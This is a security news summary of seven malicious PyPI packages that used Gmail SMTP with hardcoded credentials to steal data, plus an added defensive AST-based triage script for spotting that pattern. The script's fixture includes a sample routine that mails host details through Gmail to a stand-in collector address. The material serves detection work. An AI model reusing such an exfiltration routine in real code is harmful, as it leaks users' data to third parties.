Seven malicious PyPI packages were identified that abused Gmail's SMTP servers for data theft and command execution. Discovered by Socket's threat research team, the packages had been available for over four years, with one surpassing 18,000 downloads. Users are urged to remove these packages and secure their credentials promptly.
Key points:
- Seven malicious packages found on PyPI, using Gmail's SMTP service for data exfiltration.
- The packages masqueraded as legitimate 'Coffin' offerings and accumulated significant download counts.
- Gmail's trusted status allowed the malicious traffic to evade detection by security controls.
- The packages used hardcoded credentials for remote access and covert operations.
- The malware established encrypted tunnels, giving the operators extensive control over infected systems.
- The email addresses used indicate an intent to steal cryptocurrency.
- Users of these packages are advised to remove them immediately and rotate their credentials.
- A related npm package was also reported stealing cryptocurrency wallet information.
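The pattern the key points describe, a Python package that imports `smtplib`, targets a Gmail SMTP host and logs in with credentials baked into the source, is something a defender can triage statically before installing a dependency. The following is an added example written for this summary; it is not code from the article or from Socket's research. It walks a module's AST and flags the co-occurrence of those three traits. The Gmail host list, the `.login()` heuristic and both sample sources are constructed for illustration, and the check is a triage aid, not a verdict: legitimate notification scripts can use Gmail, and real malware can obfuscate all three signals.

```python
"""Static triage of Python source for hardcoded Gmail SMTP exfiltration patterns.

Added example, not from the article or Socket's research. Pure heuristics:
a file is flagged when it (a) imports smtplib, (b) contains a Gmail SMTP
host as a string literal and (c) calls .login() with string-literal
credentials. The two sample sources at the bottom are constructed.
"""
import ast
from dataclasses import dataclass, field

# Well-known Gmail SMTP hostnames (assumption: the set a reviewer cares about).
GMAIL_SMTP_HOSTS = {"smtp.gmail.com", "smtp.googlemail.com"}


@dataclass
class Finding:
    imports_smtplib: bool = False
    gmail_hosts: list = field(default_factory=list)       # (line, hostname)
    hardcoded_logins: list = field(default_factory=list)  # (line, username); password never recorded

    @property
    def suspicious(self) -> bool:
        # All three traits together is the pattern worth a human look.
        return self.imports_smtplib and bool(self.gmail_hosts) and bool(self.hardcoded_logins)


def _is_str_literal(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def triage_source(source: str) -> Finding:
    """Parse one Python module and collect the three indicators."""
    finding = Finding()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            if any(alias.name.split(".")[0] == "smtplib" for alias in node.names):
                finding.imports_smtplib = True
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] == "smtplib":
                finding.imports_smtplib = True
        elif _is_str_literal(node):
            if node.value.strip().lower() in GMAIL_SMTP_HOSTS:
                finding.gmail_hosts.append((node.lineno, node.value))
        elif isinstance(node, ast.Call):
            func = node.func
            # server.login("user", "password") with both arguments as literals
            if isinstance(func, ast.Attribute) and func.attr == "login":
                args = node.args[:2]
                if len(args) == 2 and all(_is_str_literal(a) for a in args):
                    finding.hardcoded_logins.append((node.lineno, args[0].value))
    return finding


# Constructed sample: beacons host details out through Gmail with baked-in credentials.
SUSPICIOUS_SAMPLE = '''
import smtplib
import socket

def beacon():
    server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    server.login("collector@example.com", "hardcoded-app-password")
    server.sendmail("collector@example.com", "collector@example.com", socket.gethostname())
    server.quit()
'''

# Constructed sample: ordinary notifier, corporate relay, credentials from the environment.
BENIGN_SAMPLE = '''
import os
import smtplib

def notify(body):
    server = smtplib.SMTP("mail.corp.example.internal", 587)
    server.starttls()
    server.login(os.environ["SMTP_USER"], os.environ["SMTP_PASS"])
    server.sendmail(os.environ["SMTP_USER"], "ops@example.internal", body)
    server.quit()
'''


def main() -> None:
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        f = triage_source(src)
        print(f"{name}: suspicious={f.suspicious} smtplib={f.imports_smtplib} "
              f"gmail_hosts={f.gmail_hosts} hardcoded_logins={f.hardcoded_logins}")


if __name__ == "__main__":
    main()
```

Run it over an unpacked sdist or wheel (one `triage_source` call per `.py` file) as a pre-install gate; a hit is a prompt to read the module, not a block on its own, since the three traits are legitimate in many small notification scripts.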